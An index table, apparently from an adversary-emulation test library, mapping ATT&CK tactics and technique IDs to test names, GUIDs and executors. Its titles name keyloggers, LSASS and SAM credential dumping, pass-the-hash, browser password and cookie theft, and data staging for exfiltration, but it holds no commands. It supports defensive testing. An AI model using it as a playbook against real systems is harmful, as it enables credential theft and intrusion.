| command-and-control | T1105 | Ingress Tool Transfer | 26 | Download a file using wscript | 97116a3f-efac-4b26-8336-b9cb18c45188 | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 27 | Linux Download File and Run | bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 | sh |
| command-and-control | T1105 | Ingress Tool Transfer | 28 | Nimgrab - Transfer Files | b1729c57-9384-4d1c-9b99-9b220afb384e | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 29 | iwr or Invoke Web-Request download | c01cad7f-7a4c-49df-985e-b190dcf6a279 | command_prompt |
| command-and-control | T1090.001 | Proxy: Internal Proxy | 1 | Connection Proxy | 0ac21132-4485-4212-a681-349e8a6637cd | sh |
| command-and-control | T1090.001 | Proxy: Internal Proxy | 2 | Connection Proxy for macOS UI | 648d68c1-8bcd-4486-9abe-71c6655b6a2c | sh |
| command-and-control | T1090.001 | Proxy: Internal Proxy | 3 | portproxy reg key | b8223ea9-4be2-44a6-b50a-9657a3d4e72a | powershell |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 1 | Compress Data for Exfiltration With Rar | 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 | command_prompt |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 2 | Compress Data and lock with password for Exfiltration with winrar | 8dd61a55-44c6-43cc-af0c-8bdda276860c | command_prompt |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 3 | Compress Data and lock with password for Exfiltration with winzip | 01df0353-d531-408d-a0c5-3161bf822134 | command_prompt |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 4 | Compress Data and lock with password for Exfiltration with 7zip | d1334303-59cb-4a03-8313-b3e24d02c198 | command_prompt |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 5 | Data Compressed - nix - zip | c51cec55-28dd-4ad2-9461-1eacbc82c3a0 | sh |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 6 | Data Compressed - nix - gzip Single File | cde3c2af-3485-49eb-9c1f-0ed60e9cc0af | sh |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 7 | Data Compressed - nix - tar Folder or File | 7af2b51e-ad1c-498c-aca8-d3290c19535a | sh |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 8 | Data Encrypted with zip and gpg symmetric | 0286eb44-e7ce-41a0-b109-3da516e05a5f | sh |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 9 | Encrypts collected data with AES-256 and Base64 | a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 | bash |
| collection | T1113 | Screen Capture | 1 | Screencapture | 0f47ceb1-720f-4275-96b8-21f0562217ac | bash |
| collection | T1113 | Screen Capture | 2 | Screencapture (silent) | deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 | bash |
| collection | T1113 | Screen Capture | 3 | X Windows Capture | 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac | bash |
| collection | T1113 | Screen Capture | 4 | Capture Linux Desktop using Import Tool | 9cd1cccb-91e4-4550-9139-e20a586fcea1 | bash |
| collection | T1113 | Screen Capture | 5 | Windows Screencapture | 3c898f62-626c-47d5-aad2-6de873d69153 | powershell |
| collection | T1113 | Screen Capture | 6 | Windows Screen Capture (CopyFromScreen) | e9313014-985a-48ef-80d9-cde604ffc187 | powershell |
| collection | T1056.001 | Input Capture: Keylogging | 1 | Input Capture | d9b633ca-8efb-45e6-b838-70f595c6ae26 | powershell |
| collection | T1056.001 | Input Capture: Keylogging | 2 | Living off the land Terminal Input Capture on Linux with pam.d | 9c6bdb34-a89f-4b90-acb1-5970614c711b | sh |
| collection | T1056.001 | Input Capture: Keylogging | 3 | Logging bash history to syslog | 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 | sh |
| collection | T1056.001 | Input Capture: Keylogging | 4 | Bash session based keylogger | 7f85a946-a0ea-48aa-b6ac-8ff539278258 | sh |
| collection | T1056.001 | Input Capture: Keylogging | 5 | SSHD PAM keylogger | 81d7d2ad-d644-4b6a-bea7-28ffe43becca | sh |
| collection | T1056.001 | Input Capture: Keylogging | 6 | Auditd keylogger | a668edb9-334e-48eb-8c2e-5413a40867af | sh |
| collection | T1056.001 | Input Capture: Keylogging | 7 | MacOS Swift Keylogger | aee3a097-4c5c-4fff-bbd3-0a705867ae29 | bash |
| collection | T1123 | Audio Capture | 1 | using device audio capture commandlet | 9c3ad250-b185-4444-b5a9-d69218a10c95 | powershell |
| collection | T1123 | Audio Capture | 2 | Registry artefact when application use microphone | 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a | command_prompt |
| collection | T1123 | Audio Capture | 3 | using Quicktime Player | c7a0bb71-70ce-4a53-b115-881f241b795b | sh |
| collection | T1074.001 | Data Staged: Local Data Staging | 1 | Stage data from Discovery.bat | 107706a5-6f9f-451a-adae-bab8c667829f | powershell |
| collection | T1074.001 | Data Staged: Local Data Staging | 2 | Stage data from Discovery.sh | 39ce0303-ae16-4b9e-bb5b-4f53e8262066 | bash |
| collection | T1074.001 | Data Staged: Local Data Staging | 3 | Zip a Folder with PowerShell for Staging in Temp | a57fbe4b-3440-452a-88a7-943531ac872a | powershell |
| collection | T1114.001 | Email Collection: Local Email Collection | 1 | Email Collection with PowerShell Get-Inbox | 3f1b5096-0139-4736-9b78-19bcb02bb1cb | powershell |
| collection | T1119 | Automated Collection | 1 | Automated Collection Command Prompt | cb379146-53f1-43e0-b884-7ce2c635ff5b | command_prompt |
| collection | T1119 | Automated Collection | 2 | Automated Collection PowerShell | 634bd9b9-dc83-4229-b19f-7f83ba9ad313 | powershell |
| collection | T1119 | Automated Collection | 3 | Recon information for export with PowerShell | c3f6d794-50dd-482f-b640-0384fbb7db26 | powershell |
| collection | T1119 | Automated Collection | 4 | Recon information for export with Command Prompt | aa1180e2-f329-4e1e-8625-2472ec0bfaf3 | command_prompt |
| collection | T1115 | Clipboard Data | 1 | Utilize Clipboard to store or execute commands from | 0cd14633-58d4-4422-9ede-daa2c9474ae7 | command_prompt |
| collection | T1115 | Clipboard Data | 2 | Execute Commands from Clipboard using PowerShell | d6dc21af-bec9-4152-be86-326b6babd416 | powershell |
| collection | T1115 | Clipboard Data | 3 | Execute commands from clipboard | 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff | bash |
| collection | T1115 | Clipboard Data | 4 | Collect Clipboard Data via VBA | 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 | powershell |
| collection | T1115 | Clipboard Data | 5 | Add or copy content to clipboard with xClip | ee363e53-b083-4230-aff3-f8d955f2d5bb | sh |
| collection | T1530 | Data from Cloud Storage Object | 1 | Azure - Enumerate Azure Blobs with MicroBurst | 3dab4bcc-667f-4459-aea7-4162dd2d6590 | powershell |
| collection | T1530 | Data from Cloud Storage Object | 2 | Azure - Scan for Anonymous Access to Azure Storage (Powershell) | 146af1f1-b74e-4aa7-9895-505eb559b4b0 | powershell |
| collection | T1530 | Data from Cloud Storage Object | 3 | AWS - Scan for Anonymous Access to S3 | 979356b9-b588-4e49-bba4-c35517c484f5 | sh |
| collection | T1560.002 | Archive Collected Data: Archive via Library | 1 | Compressing data using GZip in Python (Linux) | 391f5298-b12d-4636-8482-35d9c17d53a8 | bash |
| collection | T1560.002 | Archive Collected Data: Archive via Library | 2 | Compressing data using bz2 in Python (Linux) | c75612b2-9de0-4d7c-879c-10d7b077072d | bash |
| collection | T1560.002 | Archive Collected Data: Archive via Library | 3 | Compressing data using zipfile in Python (Linux) | 001a042b-859f-44d9-bf81-fd1c4e2200b0 | bash |
| collection | T1560.002 | Archive Collected Data: Archive via Library | 4 | Compressing data using tarfile in Python (Linux) | e86f1b4b-fcc1-4a2a-ae10-b49da01458db | bash |
| collection | T1560 | Archive Collected Data | 1 | Compress Data for Exfiltration With PowerShell | 41410c60-614d-4b9d-b66e-b0192dd9c597 | powershell |
| collection | T1557.001 | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | 1 | LLMNR Poisoning with Inveigh (PowerShell) | deecd55f-afe0-4a62-9fba-4d1ba2deb321 | powershell |
| collection | T1125 | Video Capture | 1 | Registry artefact when application use webcam | 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a | command_prompt |
| collection | T1114.003 | Email Collection: Email Forwarding Rule | 1 | Office365 - Email Forwarding | 3234117e-151d-4254-9150-3d0bac41e38c | powershell |
| collection | T1056.002 | Input Capture: GUI Input Capture | 1 | AppleScript - Prompt User for Password | 76628574-0bc1-4646-8fe2-8f4427b47d15 | bash |
| collection | T1056.002 | Input Capture: GUI Input Capture | 2 | PowerShell - Prompt User for Password | 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 | powershell |
| collection | T1039 | Data from Network Shared Drive | 1 | Copy a sensitive File over Administrative share with copy | 6ed67921-1774-44ba-bac6-adb51ed60660 | command_prompt |
| collection | T1039 | Data from Network Shared Drive | 2 | Copy a sensitive File over Administrative share with Powershell | 7762e120-5879-44ff-97f8-008b401b9a98 | powershell |
| collection | T1056.004 | Input Capture: Credential API Hooking | 1 | Hook PowerShell TLS Encrypt/Decrypt Messages | de1934ea-1fbf-425b-8795-65fb27dd7e33 | powershell |
| lateral-movement | T1091 | Replication Through Removable Media | 1 | USB Malware Spread Simulation | d44b7297-622c-4be8-ad88-ec40d7563c75 | powershell |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 1 | Map admin share | 3386975b-367a-4fbb-9d77-4dcf3639ffd3 | command_prompt |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 2 | Map Admin Share PowerShell | 514e9cd7-9207-4882-98b1-c8f791bae3c5 | powershell |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 3 | Copy and Execute File with PsExec | 0eb03d41-79e4-4393-8e57-6344856be1cf | command_prompt |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 4 | Execute command writing output to local Admin Share | d41aaab5-bdfe-431d-a3d5-c29e9136ff46 | command_prompt |
| lateral-movement | T1021.006 | Remote Services: Windows Remote Management | 1 | Enable Windows Remote Management | 9059e8de-3d7d-4954-a322-46161880b9cf | powershell |
| lateral-movement | T1021.006 | Remote Services: Windows Remote Management | 2 | Remote Code Execution with PS Credentials Using Invoke-Command | 5295bd61-bd7e-4744-9d52-85962a4cf2d6 | powershell |
| lateral-movement | T1021.006 | Remote Services: Windows Remote Management | 3 | WinRM Access with Evil-WinRM | efe86d95-44c4-4509-ae42-7bfd9d1f5b3d | powershell |
| lateral-movement | T1021.003 | Remote Services: Distributed Component Object Model | 1 | PowerShell Lateral Movement using MMC20 | 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 | powershell |
| lateral-movement | T1550.003 | Use Alternate Authentication Material: Pass the Ticket | 1 | Mimikatz Kerberos Ticket Attack | dbf38128-7ba7-4776-bedf-cc2eed432098 | command_prompt |
| lateral-movement | T1550.003 | Use Alternate Authentication Material: Pass the Ticket | 2 | Rubeus Kerberos Pass The Ticket | a2fc4ec5-12c6-4fb4-b661-961f23f359cb | powershell |
| lateral-movement | T1072 | Software Deployment Tools | 1 | Radmin Viewer Utility | b4988cad-6ed2-434d-ace5-ea2670782129 | command_prompt |
| lateral-movement | T1072 | Software Deployment Tools | 2 | PDQ Deploy RAT | e447b83b-a698-4feb-bed1-a7aaf45c3443 | command_prompt |
| lateral-movement | T1563.002 | Remote Service Session Hijacking: RDP Hijacking | 1 | RDP hijacking | a37ac520-b911-458e-8aed-c5f1576d9f46 | command_prompt |
| lateral-movement | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 1 | Mimikatz Pass the Hash | ec23cef9-27d9-46e4-a68d-6f75f7b86908 | command_prompt |
| lateral-movement | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 2 | crackmapexec Pass the Hash | eb05b028-16c8-4ad8-adea-6f5b219da9a9 | command_prompt |
| lateral-movement | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 3 | Invoke-WMIExec Pass the Hash | f8757545-b00a-4e4e-8cfb-8cfb961ee713 | powershell |
| lateral-movement | T1021.001 | Remote Services: Remote Desktop Protocol | 1 | RDP to DomainController | 355d4632-8cb9-449d-91ce-b566d0253d3e | powershell |
| lateral-movement | T1021.001 | Remote Services: Remote Desktop Protocol | 2 | Changing RDP Port to Non Standard Port via Powershell | 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 | powershell |
| lateral-movement | T1021.001 | Remote Services: Remote Desktop Protocol | 3 | Changing RDP Port to Non Standard Port via Command_Prompt | 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 | command_prompt |
| credential-access | T1556.003 | Modify Authentication Process: Pluggable Authentication Modules | 1 | Malicious PAM rule | 4b9dde80-ae22-44b1-a82a-644bf009eb9c | sh |
| credential-access | T1556.003 | Modify Authentication Process: Pluggable Authentication Modules | 2 | Malicious PAM module | 65208808-3125-4a2e-8389-a0a00e9ab326 | sh |
| credential-access | T1056.001 | Input Capture: Keylogging | 1 | Input Capture | d9b633ca-8efb-45e6-b838-70f595c6ae26 | powershell |
| credential-access | T1056.001 | Input Capture: Keylogging | 2 | Living off the land Terminal Input Capture on Linux with pam.d | 9c6bdb34-a89f-4b90-acb1-5970614c711b | sh |
| credential-access | T1056.001 | Input Capture: Keylogging | 3 | Logging bash history to syslog | 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 | sh |
| credential-access | T1056.001 | Input Capture: Keylogging | 4 | Bash session based keylogger | 7f85a946-a0ea-48aa-b6ac-8ff539278258 | sh |
| credential-access | T1056.001 | Input Capture: Keylogging | 5 | SSHD PAM keylogger | 81d7d2ad-d644-4b6a-bea7-28ffe43becca | sh |
| credential-access | T1056.001 | Input Capture: Keylogging | 6 | Auditd keylogger | a668edb9-334e-48eb-8c2e-5413a40867af | sh |
| credential-access | T1056.001 | Input Capture: Keylogging | 7 | MacOS Swift Keylogger | aee3a097-4c5c-4fff-bbd3-0a705867ae29 | bash |
| credential-access | T1110.001 | Brute Force: Password Guessing | 1 | Brute Force Credentials of single Active Directory domain users via SMB | 09480053-2f98-4854-be6e-71ae5f672224 | command_prompt |
| credential-access | T1110.001 | Brute Force: Password Guessing | 2 | Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) | c2969434-672b-4ec8-8df0-bbb91f40e250 | powershell |
| credential-access | T1110.001 | Brute Force: Password Guessing | 3 | Brute Force Credentials of single Azure AD user | 5a51ef57-299e-4d62-8e11-2d440df55e69 | powershell |
| credential-access | T1110.001 | Brute Force: Password Guessing | 4 | Password Brute User using Kerbrute Tool | 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 | powershell |
| credential-access | T1110.001 | Brute Force: Password Guessing | 5 | SUDO Brute Force - Debian | ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 | bash |
| credential-access | T1110.001 | Brute Force: Password Guessing | 6 | SUDO Brute Force - Redhat | 4097bc00-5eeb-4d56-aaf9-287d60351d95 | bash |
| credential-access | T1003 | OS Credential Dumping | 1 | Gsecdump | 96345bfc-8ae7-4b6a-80b7-223200f24ef9 | command_prompt |
| credential-access | T1003 | OS Credential Dumping | 2 | Credential Dumping with NPPSpy | 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 | powershell |
| credential-access | T1003 | OS Credential Dumping | 3 | Dump svchost.exe to gather RDP credentials | d400090a-d8ca-4be0-982e-c70598a23de9 | powershell |
| credential-access | T1003 | OS Credential Dumping | 4 | Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) | 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 | powershell |
| credential-access | T1003 | OS Credential Dumping | 5 | Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) | 42510244-5019-48fa-a0e5-66c3b76e6049 | powershell |
| credential-access | T1003 | OS Credential Dumping | 6 | Dump Credential Manager using keymgr.dll and rundll32.exe | 84113186-ed3c-4d0d-8a3c-8980c86c1f4a | powershell |
| credential-access | T1539 | Steal Web Session Cookie | 1 | Steal Firefox Cookies (Windows) | 4b437357-f4e9-4c84-9fa6-9bcee6f826aa | powershell |
| credential-access | T1539 | Steal Web Session Cookie | 2 | Steal Chrome Cookies (Windows) | 26a6b840-4943-4965-8df5-ef1f9a282440 | powershell |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 1 | Registry dump of SAM, creds, and secrets | 5c2571d0-1572-416d-9676-812e64ca9f44 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 2 | Registry parse with pypykatz | a96872b2-cbf3-46cf-8eb4-27e8c0e85263 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 3 | esentutl.exe SAM copy | a90c2f4d-6726-444e-99d2-a00cd7c20480 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 4 | PowerDump Hashes and Usernames from Registry | 804f28fc-68fc-40da-b5a2-e9d0bce5c193 | powershell |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 5 | dump volume shadow copy hives with certutil | eeb9751a-d598-42d3-b11c-c122d9c3f6c7 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 6 | dump volume shadow copy hives with System.IO.File | 9d77fed7-05f8-476e-a81b-8ff0472c64d0 | powershell |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 7 | WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes | 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb | powershell |
| credential-access | T1552.005 | Unsecured Credentials: Cloud Instance Metadata API | 1 | Azure - Search Azure AD User Attributes for Passwords | ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 | powershell |
| credential-access | T1552.005 | Unsecured Credentials: Cloud Instance Metadata API | 2 | Azure - Dump Azure Instance Metadata from Virtual Machines | cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7 | powershell |
| credential-access | T1110.002 | Brute Force: Password Cracking | 1 | Password Cracking with Hashcat | 6d27df5d-69d4-4c91-bc33-5983ffe91692 | command_prompt |
| credential-access | T1555.001 | Credentials from Password Stores: Keychain | 1 | Keychain | 1864fdec-ff86-4452-8c30-f12507582a93 | sh |
| credential-access | T1003.004 | OS Credential Dumping: LSA Secrets | 1 | Dumping LSA Secrets | 55295ab0-a703-433b-9ca4-ae13807de12f | command_prompt |
| credential-access | T1606.002 | Forge Web Credentials: SAML token | 1 | Golden SAML | b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 | powershell |
| credential-access | T1003.007 | OS Credential Dumping: Proc Filesystem | 1 | Dump individual process memory with sh (Local) | 7e91138a-8e74-456d-a007-973d67a0bb80 | sh |
| credential-access | T1003.007 | OS Credential Dumping: Proc Filesystem | 2 | Dump individual process memory with Python (Local) | 437b2003-a20d-4ed8-834c-4964f24eec63 | sh |
| credential-access | T1003.007 | OS Credential Dumping: Proc Filesystem | 3 | Capture Passwords with MimiPenguin | a27418de-bdce-4ebd-b655-38f04842bf0c | bash |
| credential-access | T1040 | Network Sniffing | 1 | Packet Capture Linux using tshark or tcpdump | 7fe741f7-b265-4951-a7c7-320889083b3e | bash |
| credential-access | T1040 | Network Sniffing | 2 | Packet Capture macOS using tcpdump or tshark | 9d04efee-eff5-4240-b8d2-07792b873608 | bash |
| credential-access | T1040 | Network Sniffing | 3 | Packet Capture Windows Command Prompt | a5b2f6a0-24b4-493e-9590-c699f75723ca | command_prompt |
| credential-access | T1040 | Network Sniffing | 4 | Windows Internal Packet Capture | b5656f67-d67f-4de8-8e62-b5581630f528 | command_prompt |
| credential-access | T1040 | Network Sniffing | 5 | Windows Internal pktmon capture | c67ba807-f48b-446e-b955-e4928cd1bf91 | command_prompt |
| credential-access | T1040 | Network Sniffing | 6 | Windows Internal pktmon set filter | 855fb8b4-b8ab-4785-ae77-09f5df7bff55 | command_prompt |
| credential-access | T1040 | Network Sniffing | 7 | Packet Capture macOS using /dev/bpfN with sudo | e6fe5095-545d-4c8b-a0ae-e863914be3aa | bash |
| credential-access | T1040 | Network Sniffing | 8 | Filtered Packet Capture macOS using /dev/bpfN with sudo | e2480aee-23f3-4f34-80ce-de221e27cd19 | bash |
| credential-access | T1040 | Network Sniffing | 9 | Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo | 10c710c9-9104-4d5f-8829-5b65391e2a29 | bash |
| credential-access | T1040 | Network Sniffing | 10 | Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo | 7a0895f0-84c1-4adf-8491-a21510b1d4c1 | bash |
| credential-access | T1040 | Network Sniffing | 11 | Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo | 515575ab-d213-42b1-aa64-ef6a2dd4641b | bash |
| credential-access | T1040 | Network Sniffing | 12 | Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo | b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 | bash |
| credential-access | T1552.002 | Unsecured Credentials: Credentials in Registry | 1 | Enumeration for Credentials in Registry | b6ec082c-7384-46b3-a111-9a9b8b14e5e7 | command_prompt |
| credential-access | T1552.002 | Unsecured Credentials: Credentials in Registry | 2 | Enumeration for PuTTY Credentials in Registry | af197fd7-e868-448e-9bd5-05d1bcd9d9e5 | command_prompt |
| credential-access | T1556.002 | Modify Authentication Process: Password Filter DLL | 1 | Install and Register Password Filter DLL | a7961770-beb5-4134-9674-83d7e1fa865c | powershell |
| credential-access | T1558.004 | Steal or Forge Kerberos Tickets: AS-REP Roasting | 1 | Rubeus asreproast | 615bd568-2859-41b5-9aed-61f6a88e48dd | powershell |
| credential-access | T1558.004 | Steal or Forge Kerberos Tickets: AS-REP Roasting | 2 | Get-DomainUser with PowerView | d6139549-7b72-4e48-9ea1-324fc9bdf88a | powershell |
| credential-access | T1558.004 | Steal or Forge Kerberos Tickets: AS-REP Roasting | 3 | WinPwn - PowerSharpPack - Kerberoasting Using Rubeus | 8c385f88-4d47-4c9a-814d-93d9deec8c71 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 1 | Extract Windows Credential Manager via VBA | 234f9b7c-b53d-4f32-897b-b880a6c9ea7b | powershell |
| credential-access | T1555 | Credentials from Password Stores | 2 | Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] | c89becbe-1758-4e7d-a0f4-97d2188a23e3 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 3 | Dump credentials from Windows Credential Manager With PowerShell [web Credentials] | 8fd5a296-6772-4766-9991-ff4e92af7240 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 4 | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] | 36753ded-e5c4-4eb5-bc3c-e8fba236878d | powershell |
| credential-access | T1555 | Credentials from Password Stores | 5 | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] | bc071188-459f-44d5-901a-f8f2625b2d2e | powershell |
| credential-access | T1555 | Credentials from Password Stores | 6 | WinPwn - Loot local Credentials - lazagne | 079ee2e9-6f16-47ca-a635-14efcd994118 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 7 | WinPwn - Loot local Credentials - Wifi Credentials | afe369c2-b42e-447f-98a3-fb1f4e2b8552 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 8 | WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords | db965264-3117-4bad-b7b7-2523b7856b92 | powershell |
| credential-access | T1552 | Unsecured Credentials | 1 | AWS - Retrieve EC2 Password Data using stratus | a21118de-b11e-4ebd-b655-42f11142df0c | sh |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 1 | Run Chrome-password Collector | 8c05b133-d438-47ca-a630-19cc464c4622 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 2 | Search macOS Safari Cookies | c1402f7b-67ca-43a8-b5f3-3143abedc01b | sh |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 3 | LaZagne - Credentials from Browser | 9a2915b3-3954-4cce-8c76-00fbf4dbd014 | command_prompt |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 4 | Simulating access to Chrome Login Data | 3d111226-d09a-4911-8715-fe11664f960d | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 5 | Simulating access to Opera Login Data | 28498c17-57e4-495a-b0be-cc1e36de408b | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 6 | Simulating access to Windows Firefox Login Data | eb8da98a-2e16-4551-b3dd-83de49baa14c | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 7 | Simulating access to Windows Edge Login Data | a6a5ec26-a2d1-4109-9d35-58b867689329 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 8 | Decrypt Mozilla Passwords with Firepwd.py | dc9cd677-c70f-4df5-bd1c-f114af3c2381 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 9 | LaZagne.py - Dump Credentials from Firefox Browser | 87e88698-621b-4c45-8a89-4eaebdeaabb1 | sh |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 10 | Stage Popular Credential Files for Exfiltration | f543635c-1705-42c3-b180-efd6dc6e7ee7 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 11 | WinPwn - BrowserPwn | 764ea176-fb71-494c-90ea-72e9d85dce76 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 12 | WinPwn - Loot local Credentials - mimi-kittenz | ec1d0b37-f659-4186-869f-31a554891611 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 13 | WinPwn - PowerSharpPack - Sharpweb for Browser Credentials | e5e3d639-6ea8-4408-9ecd-d5a286268ca0 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 14 | Simulating Access to Chrome Login Data - MacOS | 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 | sh |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 15 | WebBrowserPassView - Credentials from Browser | e359627f-2d90-4320-ba5e-b0f878155bbe | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 16 | BrowserStealer (Chrome / Firefox / Microsoft Edge) | 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 1 | Private Keys | 520ce462-7ca7-441e-b5a5-f8347f632696 | command_prompt |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 2 | Discover Private SSH Keys | 46959285-906d-40fa-9437-5a439accd878 | sh |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 3 | Copy Private SSH Keys with CP | 7c247dc7-5128-4643-907b-73a76d9135c3 | sh |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 4 | Copy Private SSH Keys with rsync | 864bb0b2-6bb5-489a-b43b-a77b3a16d68a | sh |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 5 | Copy the users GnuPG directory with rsync | 2a5a0601-f5fb-4e2e-aa09-73282ae6afca | sh |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 6 | ADFS token signing and encryption certificates theft - Local | 78e95057-d429-4e66-8f82-0f060c1ac96f | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 7 | ADFS token signing and encryption certificates theft - Remote | cab413d8-9e4a-4b8d-9b84-c985bd73a442 | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 8 | CertUtil ExportPFX | 336b25bf-4514-4684-8924-474974f28137 | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 9 | Export Root Certificate with Export-PFXCertificate | 7617f689-bbd8-44bc-adcd-6f8968897848 | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 10 | Export Root Certificate with Export-Certificate | 78b274f8-acb0-428b-b1f7-7b0d0e73330a | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 11 | Export Certificates with Mimikatz | 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86 | command_prompt |
| credential-access | T1557.001 | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | 1 | LLMNR Poisoning with Inveigh (PowerShell) | deecd55f-afe0-4a62-9fba-4d1ba2deb321 | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 1 | Dump LSASS.exe Memory using ProcDump | 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 2 | Dump LSASS.exe Memory using comsvcs.dll | 2536dee2-12fb-459a-8c37-971844fa73be | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 3 | Dump LSASS.exe Memory using direct system calls and API unhooking | 7ae7102c-a099-45c8-b985-4c7a2d05790d | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 4 | Dump LSASS.exe Memory using NanoDump | dddd4aca-bbed-46f0-984d-e4c5971c51ea | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 5 | Dump LSASS.exe Memory using Windows Task Manager | dea6c349-f1c6-44f3-87a1-1ed33a59a607 | manual |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 6 | Offline Credential Theft With Mimikatz | 453acf13-1dbd-47d7-b28a-172ce9228023 | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 7 | LSASS read with pypykatz | c37bc535-5c62-4195-9cc3-0517673171d8 | command_prompt |
